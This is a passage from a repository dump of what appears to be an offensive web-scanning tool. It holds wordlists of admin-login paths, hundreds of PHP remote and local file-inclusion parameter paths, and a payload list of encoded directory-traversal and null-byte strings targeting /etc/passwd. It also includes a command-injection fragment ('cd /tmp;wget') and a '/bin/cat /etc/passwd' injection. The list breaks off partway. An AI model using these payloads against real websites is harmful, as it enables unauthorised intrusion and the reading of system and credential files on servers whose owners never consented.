| controlpanel.brf 824 | admincontrol.brf 825 | admin/adminLogin.html 826 | adminLogin.html 827 | admin/adminLogin.html 828 | home.html 829 | rcjakar/admin/login.brf 830 | adminarea/index.html 831 | adminarea/admin.html 832 | webadmin.brf 833 | webadmin/index.brf 834 | webadmin/admin.brf 835 | admin/controlpanel.html 836 | admin.html 837 | admin/cp.html 838 | cp.html 839 | adminpanel.brf 840 | moderator.html 841 | administrator/index.html 842 | administrator/login.html 843 | user.html 844 | administrator/account.html 845 | administrator.html 846 | login.html 847 | modelsearch/login.html 848 | moderator/login.html 849 | adminarea/login.html 850 | panel-administracion/index.html 851 | panel-administracion/admin.html 852 | modelsearch/index.html 853 | modelsearch/admin.html 854 | admincontrol/login.html 855 | adm/index.html 856 | adm.html 857 | moderator/admin.html 858 | user.brf 859 | account.html 860 | controlpanel.html 861 | admincontrol.html 862 | panel-administracion/login.brf 863 | wp-login.brf 864 | adminLogin.brf 865 | admin/adminLogin.brf 866 | home.brf 867 | admin.brf 868 | adminarea/index.brf 869 | adminarea/admin.brf 870 | adminarea/login.brf 871 | panel-administracion/index.brf 872 | panel-administracion/admin.brf 873 | modelsearch/index.brf 874 | modelsearch/admin.brf 875 | admincontrol/login.brf 876 | adm/admloginuser.brf 877 | admloginuser.brf 878 | admin2.brf 879 | admin2/login.brf 880 | admin2/index.brf 881 | usuarios/login.brf 882 | adm/index.brf 883 | adm.brf 884 | affiliate.brf 885 | adm_auth.brf 886 | memberadmin.brf 887 | administratorlogin.brf 888 | -------------------------------------------------------------------------------- /core/geoip.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/darkhunter141/Web-Hunter/81a897f5c3f229864cc3fd8570cf042ab22fb94a/core/geoip.py -------------------------------------------------------------------------------- /core/lafid.txt: -------------------------------------------------------------------------------- 1 | /includes/header.php?systempath= 2 | /Gallery/displayCategory.php?basepath= 3 | /index.inc.php?PATH_Includes= 4 | /ashnews.php?pathtoashnews= 5 | /ashheadlines.php?pathtoashnews= 6 | /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= 7 | /demo/includes/init.php?user_inc= 8 | /jaf/index.php?show= 9 | /inc/shows.inc.php?cutepath= 10 | /poll/admin/common.inc.php?base_path= 11 | /pollvote/pollvote.php?pollname= 12 | /sources/post.php?fil_config= 13 | /modules/My_eGallery/public/displayCategory.php?basepath= 14 | /bb_lib/checkdb.inc.php?libpach= 15 | /include/livre_include.php?no_connect=lol&chem_absolu= 16 | /index.php?from_market=Y&pageurl= 17 | /modules/mod_mainmenu.php?mosConfig_absolute_path= 18 | /pivot/modules/module_db.php?pivot_path= 19 | /modules/4nAlbum/public/displayCategory.php?basepath= 20 | /derniers_commentaires.php?rep= 21 | /modules/coppermine/themes/default/theme.php?THEME_DIR= 22 | /modules/coppermine/include/init.inc.php?CPG_M_DIR= 23 | /modules/coppermine/themes/coppercop/theme.php?THEME_DIR= 24 | /coppermine/themes/maze/theme.php?THEME_DIR= 25 | /myPHPCalendar/admin.php?cal_dir= 26 | /agendax/addevent.inc.php?agendax_path= 27 | /modules/mod_mainmenu.php?mosConfig_absolute_path= 28 | /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR= 29 | /main.php?page= 30 | /default.php?page= 31 | /index.php?action= 32 | /index1.php?p= 33 | /index2.php?x= 34 | /index2.php?content= 35 | /index.php?conteudo= 36 | /index.php?cat= 37 | /include/new-visitor.inc.php?lvc_include_dir= 38 | /modules/agendax/addevent.inc.php?agendax_path= 39 | /shoutbox/expanded.php?conf= 40 | /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= 41 | /pivot/modules/module_db.php?pivot_path= 42 | /library/editor/editor.php?root= 43 | /library/lib.php?root= 44 | /e107/e107_handlers/secure_img_render.php?p= 45 | /zentrack/index.php?configFile= 46 | /main.php?x= 47 | /becommunity/community/index.php?pageurl= 48 | /GradeMap/index.php?page= 49 | /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]= 50 | /zentrack/index.php?configFile= 51 | /pivot/modules/module_db.php?pivot_path= 52 | /inc/header.php/step_one.php?server_inc= 53 | /install/index.php?lng=../../include/main.inc&G_PATH= 54 | /inc/pipe.php?HCL_path= 55 | /include/write.php?dir= 56 | /include/new-visitor.inc.php?lvc_include_dir= 57 | /includes/header.php?systempath= 58 | /support/mailling/maillist/inc/initdb.php?absolute_path= 59 | /coppercop/theme.php?THEME_DIR= 60 | /zentrack/index.php?configFile= 61 | /pivot/modules/module_db.php?pivot_path= 62 | /inc/header.php/step_one.php?server_inc= 63 | /install/index.php?lng=../../include/main.inc&G_PATH= 64 | /inc/pipe.php?HCL_path= 65 | /include/write.php?dir= 66 | /include/new-visitor.inc.php?lvc_include_dir= 67 | /includes/header.php?systempath= 68 | /support/mailling/maillist/inc/initdb.php?absolute_path= 69 | /coppercop/theme.php?THEME_DIR= 70 | /becommunity/community/index.php?pageurl= 71 | /shoutbox/expanded.php?conf= 72 | /agendax/addevent.inc.php?agendax_path= 73 | /myPHPCalendar/admin.php?cal_dir= 74 | /yabbse/Sources/Packages.php?sourcedir= 75 | /zboard/zboard.php 76 | /path_of_cpcommerce/_functions.php?prefix 77 | /dotproject/modules/projects/addedit.php?root_dir= 78 | /dotproject/modules/projects/view.php?root_dir= 79 | /dotproject/modules/projects/vw_files.php?root_dir= 80 | /dotproject/modules/tasks/addedit.php?root_dir= 81 | /dotproject/modules/tasks/viewgantt.php?root_dir= 82 | /My_eGallery/public/displayCategory.php?basepath= 83 | /modules/My_eGallery/public/displayCategory.php?basepath= 84 | /modules/4nAlbum/public/displayCategory.php?basepath= 85 | /modules/coppermine/themes/default/theme.php?THEME_DIR= 86 | /modules/agendax/addevent.inc.php?agendax_path= 87 | /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR= 88 | /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= 89 | /modules/coppermine/include/init.inc.php?CPG_M_DIR= 90 | /modules/mod_mainmenu.php?mosConfig_absolute_path= 91 | /shoutbox/expanded.php?conf= 92 | /pivot/modules/module_db.php?pivot_path= 93 | /library/editor/editor.php?root= 94 | /library/lib.php?root= 95 | /e107/e107_handlers/secure_img_render.php?p= 96 | /main.php?x= 97 | /main.php?page= 98 | /default.php?page= 99 | /index.php?meio.php= 100 | /index.php?include= 101 | /index.php?inc= 102 | /index.php?page= 103 | /index.php?pag= 104 | /index.php?p= 105 | /index.php?x= 106 | /index.php?open= 107 | /index.php?open= 108 | /index.php?visualizar= 109 | /index.php?pagina= 110 | /index.php?content= 111 | /index.php?cont= 112 | /index.php?c= 113 | /index.php?meio= 114 | /index.php?x= 115 | /index.php?cat= 116 | /index.php?site= 117 | /index.php?configFile= 118 | /index.php?action= 119 | /index.php?do= 120 | /index2.php?x= 121 | /index2.php?content= 122 | /template.php?pagina= 123 | /inc/step_one_tables.php?server_inc= 124 | /GradeMap/index.php?page= 125 | /phpshop/index.php?base_dir= 126 | /admin.php?cal_dir= 127 | /path_of_cpcommerce/_functions.php?prefix= 128 | /contacts.php?cal_dir= 129 | /convert-date.php?cal_dir= 130 | /album_portal.php?phpbb_root_path= 131 | /mainfile.php?MAIN_PATH= 132 | /dotproject/modules/files/index_table.php?root_dir= 133 | /html/affich.php?base= 134 | /gallery/init.php?HTTP_POST_VARS= 135 | /pm/lib.inc.php?pm_path= 136 | /ideabox/include.php?gorumDir= 137 | index2.php?includes_dir= 138 | forums/toplist.php?phpbb_root_path= 139 | forum/toplist.php?phpbb_root_path= 140 | admin/config_settings.tpl.php?include_path= 141 | include/common.php?include_path= 142 | event/index.php?page= 143 | forum/index.php?includeFooter= 144 | forums/index.php?includeFooter= 145 | forum/bb_admin.php?includeFooter= 146 | forums/bb_admin.php?includeFooter= 147 | language/lang_english/lang_activity.php?phpbb_root_path= 148 | forum/language/lang_english/lang_activity.php?phpbb_root_path= 149 | blend_data/blend_common.php?phpbb_root_path= 150 | master.php?root_path= 151 | includes/kb_constants.php?module_root_path= 152 | forum/includes/kb_constants.php?module_root_path= 153 | forums/includes/kb_constants.php?module_root_path= 154 | classes/adodbt/sql.php?classes_dir= 155 | agenda.php3?rootagenda= 156 | agenda2.php3?rootagenda= 157 | public_includes/pub_popup/popup_finduser.php?vsDragonRootPath= 158 | extras/poll/poll.php?file_newsportal= 159 | index.php?site_path= 160 | mail/index.php?site_path= 161 | fclick/show.php?path= 162 | show.php?path= 163 | calogic/reconfig.php?GLOBALS[CLPath]= 164 | eshow.php?Config_rootdir= 165 | auction/auction_common.php?phpbb_root_path= 166 | index.php?inc_dir= 167 | calendar/index.php?inc_dir= 168 | modules/TotalCalendar/index.php?inc_dir= 169 | modules/calendar/index.php?inc_dir= 170 | calendar/embed/day.php?path= 171 | ACalendar/embed/day.php?path= 172 | calendar/add_event.php?inc_dir= 173 | claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys= 174 | claroline/auth/ldap/authldap.php?includePath= 175 | docebo/modules/credits/help.php?lang= 176 | modules/credits/help.php?lang= 177 | config.php?returnpath= 178 | editsite.php?returnpath= 179 | in.php?returnpath= 180 | addsite.php?returnpath= 181 | includes/pafiledb_constants.php?module_root_path= 182 | phpBB/includes/pafiledb_constants.php?module_root_path= 183 | pafiledb/includes/pafiledb_constants.php?module_root_path= 184 | auth/auth.php?phpbb_root_path= 185 | auth/auth_phpbb/phpbb_root_path= 186 | phpdig/includes/config.php?relative_script_path= 187 | includes/phpdig/includes/config.php?relative_script_path= 188 | includes/dbal.php?eqdkp_root_path= 189 | eqdkp/includes/dbal.php?eqdkp_root_path= 190 | dkp/includes/dbal.php?eqdkp_root_path= 191 | path/include/SQuery/gameSpy2.php?libpath= 192 | topsites/config.php?returnpath= 193 | ubbthreads/addpost_newpoll.php?addpoll=thispath= 194 | forum/addpost_newpoll.php?thispath= 195 | forums/addpost_newpoll.php?thispath= 196 | ubbthreads/ubbt.inc.php?thispath= 197 | forums/ubbt.inc.php?thispath= 198 | forum/ubbt.inc.php?thispath= 199 | forum/admin/addentry.php?phpbb_root_path= 200 | admin/addentry.php?phpbb_root_path= 201 | index.php?f= 202 | index.php?act= 203 | ipchat.php?root_path= 204 | stats.php?dir[func]=dir[base]= 205 | ladder/stats.php?dir[base]= 206 | ladders/stats.php?dir[base]= 207 | sphider/admin/configset.php?settings_dir= 208 | admin/configset.php?settings_dir= 209 | vwar/admin/admin.php?vwar_root= 210 | modules/vwar/admin/admin.php?vwar_root= 211 | modules/vWar_Account/includes/get_header.php?vwar_root= 212 | modules/vWar_Account/includes/functions_common.php?vwar_root2= 213 | sphider/admin/configset.php?settings_dir= 214 | admin/configset.php?settings_dir= 215 | impex/ImpExData.php?systempath= 216 | forum/impex/ImpExData.php?systempath= 217 | forums/impex/ImpExData.php?systempath= 218 | application.php?base_path= 219 | index.php?theme_path= 220 | become_editor.php?theme_path= 221 | add.php?theme_path= 222 | bad_link.php?theme_path= 223 | browse.php?theme_path= 224 | detail.php?theme_path= 225 | fav.php?theme_path= 226 | get_rated.php?theme_path= 227 | login.php?theme_path= 228 | mailing_list.php?theme_path= 229 | new.php?theme_path= 230 | modify.php?theme_path= 231 | pick.php?theme_path= 232 | power_search.php?theme_path= 233 | rating.php?theme_path= 234 | register.php?theme_path= 235 | review.php?theme_path= 236 | rss.php?theme_path= 237 | search.php?theme_path= 238 | send_pwd.php?theme_path= 239 | sendmail.php?theme_path= 240 | tell_friend.php?theme_path= 241 | top_rated.php?theme_path= 242 | user_detail.php?theme_path= 243 | user_search.php?theme_path= 244 | invoice.php?base_path= 245 | cgi-bin//classes/adodbt/sql.php?classes_dir= 246 | cgi-bin/install/index.php?G_PATH= 247 | cgi-bin/include/print_category.php?dir= 248 | includes/class_template.php?quezza_root_path= 249 | bazar/classified_right.php?language_dir= 250 | classified_right.php?language_dir= 251 | phpBazar/classified_right.php?language_dir= 252 | chat/messagesL.php3?cmd= 253 | phpMyChat/chat/messagesL.php3?cmd= 254 | bbs/include/write.php?dir= 255 | visitorupload.php?cmd= 256 | index.php?template= 257 | armygame.php?libpath= 258 | lire.php?rub= 259 | pathofhostadmin/?page= 260 | apa_phpinclude.inc.php?apa_module_basedir= 261 | index.php?req_path= 262 | research/boards/encapsbb-0.3.2_fixed/index_header.php?root= 263 | Farsi1/index.php?archive= 264 | index.php?archive= 265 | show_archives.php?template= 266 | forum/include/common.php?pun_root= 267 | vuln.php?= 268 | cgi-bin//include/write.php?dir= 269 | admin/common.inc.php?basepath= 270 | pm/lib.inc.php?sfx= 271 | pm/lib.inc.php?pm_path= 272 | artmedic-kleinanzeigen-path/index.php?id= 273 | index.php?pagina= 274 | osticket/include/main.php?include_dir= 275 | quick_reply.php?phpbb_root_path= 276 | zboard/include/write.php?dir= 277 | PATH/admin/plog-admin-functions.php?configbasedir= 278 | path_to_phpgreetz/content.php?content= 279 | path_to_qnews/q-news.php?id= 280 | _conf/core/common-tpl-vars.php?confdir= 281 | votebox.php?VoteBoxPath= 282 | al_initialize.php?alpath= 283 | protection.php?siteurl= 284 | modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]= 285 | index2.php?includes_dir= 286 | classes.php?LOCAL_PATH= 287 | extensions/moblog/moblog_lib.php?basedir= 288 | phpWebLog/include/init.inc.php?G_PATH= 289 | admin/objects.inc.php4?Server= 290 | trg_news30/trgnews/install/article.php?dir= 291 | block.php?Include= 292 | arpuivo.php?data= 293 | path_to_gallery/setup/index.php?GALLERY_BASEDIR= 294 | include/help.php?base= 295 | index.php?[Home]= 296 | path_to_script/block.php?Include= 297 | examples/phonebook.php?page= 298 | PHPNews/auth.php?path= 299 | include/print_category.php?dir= 300 | skin/zero_vote/login.php?dir= 301 | skin/zero_vote/setup.php?dir= 302 | skin/zero_vote/ask_password.php?dir= 303 | gui/include/sql.php?include_path= 304 | webmail/lib/emailreader_execute_on_each_page.inc.php?emailread er_ini= 305 | email.php?login=cer_skin= 306 | PhotoGal/ops/gals.php?news_file= 307 | index.php?custom= 308 | loginout.php?cutepath= 309 | xcomic/initialize.php?xcomicRootPath= 310 | skin/zero_vote/setup.php?dir= 311 | skin/zero_vote/error.php? dir= 312 | includes/db_adodb.php?baseDir= 313 | includes/db_connect.php?baseDir= 314 | includes/session.php?baseDir= 315 | modules/admin/vw_usr_roles.php?baseDir= 316 | modules/public/calendar.php?baseDir= 317 | modules/public/date_format.php?baseDir= 318 | modules/tasks/gantt.php?baseDir= 319 | mantis/login_page.php?g_meta_include_file= 320 | phpgedview/help_text_vars.php?PGV_BASE_DIRECTORY= 321 | modules/My_eGallery/public/displayCategory.php?basepath= 322 | dotproject/modules/files/index_table.php?root_dir= 323 | nukebrowser.php?filnavn= 324 | bug_sponsorship_list_view_inc.php?t_core_path= 325 | modules/coppermine/themes/coppercop/theme.php?THEME_DIR= 326 | modules/coppermine/themes/maze/theme.php?THEME_DIR= 327 | modules/coppermine/include/init.inc.php?CPG_M_DIR= 328 | includes/calendar.php?phpc_root_path= 329 | includes/setup.php?phpc_root_path= 330 | phpBB/admin/admin_styles.php?mode= 331 | aMember/plugins/db/mysql/mysql.inc.php?config= 332 | admin/lang.php?CMS_ADMIN_PAGE= 333 | inc/pipe.php?HCL_path= 334 | include/write.php?dir= 335 | becommunity/community/index.php?pageurl= 336 | modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR= 337 | modules/mod_mainmenu.php?mosConfig_absolute_path= 338 | modules/agendax/addevent.inc.php?agendax_path= 339 | shoutbox/expanded.php?conf= 340 | modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= 341 | index.php?page= 342 | index.php?pag= 343 | index.php?include= 344 | index.php?content= 345 | index.php?cont= 346 | index.php?c= 347 | modules/My_eGallery/index.php?basepath= 348 | modules/newbb_plus/class/forumpollrenderer.php?bbPath= 349 | journal.php?m= 350 | index.php?m= 351 | links.php?c= 352 | forums.php?m= 353 | list.php?c= 354 | user.php?xoops_redirect= 355 | index.php?id= 356 | r.php?url= 357 | inc/formmail.inc.php?script_root= 358 | include/init.inc.php?G_PATH= 359 | backend/addons/links/index.php?PATH= 360 | protection.php?siteurl= 361 | htmltonuke.php?filnavn= 362 | mail_autocheck.php?pm_path= 363 | index.php?p= 364 | modules/4nAlbum/public/displayCategory.php?basepath= 365 | e107/e107_handlers/secure_img_render.php?p= 366 | include/new-visitor.inc.php?lvc_include_dir= 367 | path_of_cpcommerce/_functions.php?prefix= 368 | community/modules/agendax/addevent.inc.php?agendax_path= 369 | library/editor/editor.php?root= 370 | library/lib.php?root= 371 | zentrack/index.php?configFile= 372 | pivot/modules/module_db.php?pivot_path= 373 | main.php?x= 374 | myPHPCalendar/admin.php?cal_dir= 375 | index.php/main.php?x= 376 | index.php?x= 377 | index.php?open= 378 | index.php?visualizar= 379 | template.php?pagina= 380 | index.php?inc= 381 | includes/include_onde.php?include_file= 382 | index.php?pg= 383 | index.php?show= 384 | index.php?cat= 385 | print.php?val1= 386 | cmd.php?function= 387 | iframe.php?file= 388 | os/pointer.php?url= 389 | p_uppc_francais/pages_php/p_aidcon_conseils/index.php?FM= 390 | index.php?file= 391 | db.php?path_local= 392 | phpGedView/individual.php?PGV_BASE_DIRECTORY= 393 | Sources/Packages.php?sourcedir= 394 | yabbse/Sources/Packages.php?sourcedir= 395 | modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path= 396 | cgi-bin//gadgets/Blog/BlogModel.php?path= 397 | cgi-bin//admin.php?cal_dir= 398 | gallery/captionator.php?GALLERY_BASEDIR= 399 | cgi-bin/main.php?x= 400 | Blog/BlogModel.php?path= 401 | admin.php?cal_dir= 402 | expanded.php?conf= 403 | pollvote/pollvote.php?pollname= 404 | displayCategory.php?basepath= 405 | phpBB2/admin/admin_cash.php?phpbb_root_path= 406 | modules/foro/includes/functions_admin.php?phpbb_root_path= 407 | modules/Forums/admin/admin_forums.php?phpEx= 408 | modules/Forums/admin/admin_disallow.php?phpEx= 409 | modules/Forums/admin/admin_smilies.php?phpEx= 410 | modules/Forums/admin/admin_board.php?phpEx= 411 | modules/Forums/admin/admin_users.php?phpEx= 412 | modules/Forums/admin/admin_mass_email.php?phpEx= 413 | modules/Forums/admin/admin_forum_prune.php?phpEx= 414 | modules/Forums/admin/admin_styles.php?phpbb_root_path= 415 | index.php?hc= 416 | mt-comments.cgi?id= 417 | webcalendar/tools/send_reminders.php?includedir= 418 | cmd/product_info.php/products_id/1622/shop_content.php?coID= 419 | addevent.inc.php?agendax_path= 420 | step_one.php?server_inc= 421 | upgrade_album.php?GALLERY_BASEDIR= 422 | search.php?cutepath= 423 | modules.php?name= 424 | wagora/extras//quicklist.php?site= 425 | vCard/admin/define.inc.php?match= 426 | forum/ubbthreads.php?Cat= 427 | admin/includes/classes/spaw/spaw_control.class.php?spaw_root= 428 | secure.php?cfgProgDir= 429 | modules/My_eGallery/public//inc/?HCL_path= 430 | modules/My_eGallery/public/imagen.php?basepath= 431 | adlayer.php?layerstyle= 432 | Forums/bb_smilies.php?name= 433 | modules/Forums/bb_smilies.php?name= 434 | gadgets/Blog/BlogModel.php?path= 435 | learnlinc/clmcpreload.php?CLPATH= 436 | modernbill/samples/news.php?DIR= 437 | religions/faq.php?page= 438 | forum/viewtopic.php?t= 439 | announcements.php?includePath= 440 | inc/header.php/step_one.php?server_inc= 441 | phpatm/index.php?include_location= 442 | gb/form.inc.php3?lang= 443 | shannen/index.php?x= 444 | family/phpgedview/index.php?PGV_BASE_DIRECTORY= 445 | main.php?left= 446 | forum/misc.php?action= 447 | nucleus/libs/globalfunctions.php?DIR_LIBS= 448 | show_archives.php?cutepath= 449 | gallery.php= 450 | magicforum/misc.php?action= 451 | forum/admin/actions/del.php?include_path= 452 | index.php?meio= 453 | local/investing_industrialeastate1.php?a= 454 | modules/coppermine/themes/default/theme.php?THEME_DIR 455 | Popper/index.php?childwindow.inc.php?form= 456 | class.mysql.php?path_to_bt_dir= 457 | include/footer.inc.php?_AMLconfig[cfg_serverpath]= 458 | eyeos/desktop.php?baccio= 459 | ashnews.php?pathtoashnews= 460 | index.php?modpath= 461 | becommunity/community/index.php?pageurl= 462 | index.php?sqld= 463 | modules/module_db.php?pivot_path= 464 | catalog/includes/include_once.php?include_file= 465 | cgi-bin/calendar.pl?fromTemplate= 466 | live/inc/pipe.php?HCL_path= 467 | zb41/include/write.php?dir= 468 | cgi-bin/awstats.pl?logfile= 469 | presse/stampa.php3?azione= 470 | inc/step_one_tables.php?server_inc= 471 | index.php?mainpage= 472 | phpprojekt/lib/authform.inc.php?path_pre= 473 | captionator.php?GALLERY_BASEDIR= 474 | _head.php?_zb_path=.example.com 475 | achievo/atk/javascript/class.atkdateattribute.js.php?config_atkroot= 476 | gallery/captionator.php?GALLERY_BASEDIR=.example.com 477 | globals.php3?LangCookie=.example.com 478 | include/msql.php?inc_dir= 479 | include/mssql7.php?inc_dir= 480 | include/mysql.php?inc_dir= 481 | include/oci8.php?inc_dir= 482 | include/postgres.php?inc_dir= 483 | include/postgres65.php?inc_dir= 484 | install.php?phpbb_root_dir= 485 | mantis/login_page.php?g_meta_inc_dir= 486 | page.php?template= 487 | phorum/admin/actions/del.php?include_path= 488 | pollensondage.inc.php?app_path= 489 | user/agora_user.php?inc_dir= 490 | user/ldap_example.php?inc_dir= 491 | userlist.php?ME=.example.com 492 | _functions.php?prefix= 493 | cpcommerce/_functions.php?prefix= 494 | ashnews.php?pathtoashnews=cd /tmp;wget 495 | b2-tools/gm-2-b2.php?b2inc= 496 | includes/include_once.php?include_file= 497 | modules.php?name=jokeid= 498 | index.php?site= 499 | livehelp/inc/pipe.php?HCL_path= 500 | hcl/inc/pipe.php?HCL_path= 501 | support/faq/inc/pipe.php?HCL_path= 502 | help/faq/inc/pipe.php?HCL_path= 503 | helpcenter/inc/pipe.php?HCL_path= 504 | live-support/inc/pipe.php?HCL_path= 505 | gnu3/index.php?doc= 506 | gnu/index.php?doc= 507 | phpgwapi/setup/tables_update.inc.php?appdir= 508 | includes/calendar.php?phpc_root_path= 509 | includes/setup.php?phpc_root_path= 510 | inc/authform.inc.php?path_pre= 511 | include/authform.inc.php?path_pre= 512 | web_statistics/modules/coppermine/themes/default/theme.php?THEME_DIR= 513 | web_statistics//tools/send_reminders.php?includedir= 514 | web_statistics//include/write.php?dir= 515 | web_statistics//modules/My_eGallery/public/displayCategory.php?basepath= 516 | web_statistics//calendar/tools/send_reminders.php?includedir= 517 | web_statistics//skin/zero_vote/error.php?dir= 518 | web_statistics//coppercop/theme.php?THEME_DIR= 519 | includes/header.php?systempath= 520 | Gallery/displayCategory.php?basepath= 521 | index.inc.php?PATH_Includes= 522 | ashheadlines.php?pathtoashnews= 523 | demo/includes/init.php?user_inc= 524 | jaf/index.php?show= 525 | inc/shows.inc.php?cutepath= 526 | poll/admin/common.inc.php?base_path= 527 | sources/post.php?fil_config= 528 | bb_lib/checkdb.inc.php?libpach= 529 | include/livre_include.php?chem_absolu= 530 | index.php?pageurl= 531 | derniers_commentaires.php?rep= 532 | modules/coppermine/themes/default/theme.php?THEME_DIR= 533 | coppermine/themes/maze/theme.php?THEME_DIR= 534 | agendax/addevent.inc.php?agendax_path= 535 | main.php?page= 536 | default.php?page= 537 | index.php?action= 538 | index1.php?p= 539 | index2.php?x= 540 | index2.php?content= 541 | index.php?conteudo= 542 | GradeMap/index.php?page= 543 | phpopenchat/contrib/yabbse/poc.php?sourcedir= 544 | calendar/calendar.php?serverPath= 545 | calendar/functions/popup.php?serverPath= 546 | calendar/events/header.inc.php?serverPath= 547 | calendar/events/datePicker.php?serverPath= 548 | calendar/setup/setupSQL.php?serverPath= 549 | calendar/setup/header.inc.php?serverPath= 550 | install/index.php?G_PATH= 551 | support/mailling/maillist/inc/initdb.php?absolute_path= 552 | coppercop/theme.php?THEME_DIR= 553 | dotproject/modules/projects/addedit.php?root_dir= 554 | dotproject/modules/projects/view.php?root_dir= 555 | dotproject/modules/projects/vw_files.php?root_dir= 556 | dotproject/modules/tasks/addedit.php?root_dir= 557 | dotproject/modules/tasks/viewgantt.php?root_dir= 558 | My_eGallery/public/displayCategory.php?basepath= 559 | index.php?meio.php= 560 | index.php?configFile= 561 | index.php?do= 562 | phpshop/index.php?base_dir= 563 | contacts.php?cal_dir= 564 | convert-date.php?cal_dir= 565 | album_portal.php?phpbb_root_path= 566 | mainfile.php?MAIN_PATH= 567 | html/affich.php?base= 568 | gallery/init.php?HTTP_POST_VARS= 569 | ideabox/include.php?gorumDir= 570 | stats/modules/My_eGallery/index.php?basepath= 571 | stats/include/write.php?dir= 572 | stats/tools/send_reminders.php?includedir= 573 | index.cgiupgrade_album.php?GALLERY_BASEDIR= 574 | pollvote/pollvote.php?pollname 575 | includes/page_header.php?dir= 576 | index2.php?mosConfig_absolute_path= 577 | new/bbs//include/write.php?dir= 578 | index.php?mosConfig_absolute_path= 579 | modules/My_eGallery/public/inc/?HCL_path= 580 | /forum/auth/auth.php?phpbb_root_path= 581 | /forum/auth/auth_phpbb/phpbb_root_path= 582 | /cutenews/comments.php?cutepath= 583 | /library/lib.php?root= 584 | /impex/ImpExData.php?systempath= 585 | /coppermine/thumbnails.php?lang= 586 | /gallery/thumbnails.php?lang= 587 | /aWebNews/visview.php?path_to_news= 588 | /ashnews.php?pathtoashnews= 589 | /4images/index.php?template= 590 | /galeri/index.php?template= 591 | /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path= 592 | /components/com_smf/smf.php?mosConfig_absolute_path= 593 | /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path= 594 | /components/com_simpleboard/image_upload.php?sbp= 595 | /gallery/index.php?template= 596 | /auth/auth.php?phpbb_root_path= 597 | /auth/auth_phpbb/phpbb_root_path= 598 | /modules/Forums/admin/index.php?phpbb_root_path= 599 | /modules/Forums/admin/admin_avatar.php?phpbb_root_path= 600 | /modules/Forums/admin/admin_styles.php?phpbb_root_path= 601 | /_wk/wk_lang.php?wkPath= 602 | /shoutbox/expanded.php?conf= 603 | /myPHPCalendar/admin.php?cal_dir= 604 | /phorum/plugin/replace/plugin.php?PHORUM[settings_dir]= 605 | /modules/Forums/admin/admin_board.php?phpEx= 606 | /modules/Forums/admin/admin_users.php?phpEx= 607 | /library/editor/editor.php?root= 608 | /library/lib.php?root= 609 | /e107/e107_handlers/secure_img_render.php?p= 610 | /modules/My_eGallery/public/displayCategory.php?basepath= 611 | /modules/My_eGallery/index.php?basepath= 612 | /modules/coppermine/themes/default/theme.php?THEME_DIR= 613 | /modules/4nAlbum/public/displayCategory.php?basepath= 614 | /modules/coppermine/themes/coppercop/theme.php?THEME_DIR= 615 | /modules/coppermine/themes/maze/theme.php?THEME_DIR= 616 | /modules/coppermine/include/init.inc.php?CPG_M_DIR= 617 | /phpBB/admin/admin_styles.php?mode= 618 | /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR= 619 | /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= 620 | /index.php?page= 621 | /index.php?pag= 622 | /index.php?sayfa= 623 | /index.php?pg= 624 | /index.php?include= 625 | /index.php?content= -------------------------------------------------------------------------------- /core/lfipd.txt: -------------------------------------------------------------------------------- 1 | %00../../../../../../etc/passwd 2 | %00/etc/passwd%00 3 | %0a/bin/cat%20/etc/passwd 4 | /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 5 | ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd 6 | ..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd 7 | \\'/bin/cat%20/etc/passwd\\' 8 | /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd 9 | /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd 10 | /etc/default/passwd 11 | /etc/master.passwd 12 | ././././././././././././etc/passwd 13 | .//.//.//.//.//.//.//.//.//.//.//.//etc//passwd 14 | /./././././././././././etc/passwd 15 | /../../../../../../../../../../etc/passwd 16 | /../../../../../../../../../../etc/passwd^^ 17 | /..\../..\../..\../..\../..\../..\../etc/passwd 18 | /etc/passwd 19 | ../../../../../../../../../../../../etc/passwd 20 | ../../../../../../../../../../../etc/passwd 21 | ../../../../../../../../../../etc/passwd 22 | ../../../../../../../../../etc/passwd 23 | ../../../../../../../../etc/passwd 24 | ../../../../../../../etc/passwd 25 | ../../../../../../etc/passwd 26 | ../../../../../etc/passwd 27 | ../../../../etc/passwd 28 | ../../../etc/passwd 29 | ../../etc/passwd 30 | ../etc/passwd 31 | ..\..\..\..\..\..\..\..\..\..\etc\passwd 32 | .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd 33 | \..\..\..\..\..\..\..\..\..\..\etc\passwd 34 | etc/passwd 35 | /etc/passwd%00 36 | ../../../../../../../../../../../../etc/passwd%00 37 | ../../../../../../../../../../../etc/passwd%00 38 | ../../../../../../../../../../etc/passwd%00 39 | ../../../../../../../../../etc/passwd%00 40 | ../../../../../../../../etc/passwd%00 41 | ../../../../../../../etc/passwd%00 42 | ../../../../../../etc/passwd%00 43 | ../../../../../etc/passwd%00 44 | ../../../../etc/passwd%00 45 | ../../../etc/passwd%00 46 | ../../etc/passwd%00 47 | ../etc/passwd%00 48 | ..\..\..\..\..\..\..\..\..\..\etc\passwd%00 49 | \..\..\..\..\..\..\..\..\..\..\etc\passwd%00 50 | /../../../../../../../../../../../etc/passwd%00.html 51 | /../../../../../../../../../../../etc/passwd%00.jpg 52 | ../../../../../../etc/passwd&=%3C%3C%3C%3C 53 | ..2fetc2fpasswd 54 | ..2fetc2fpasswd%00 55 | ..2f..2fetc2fpasswd 56 | 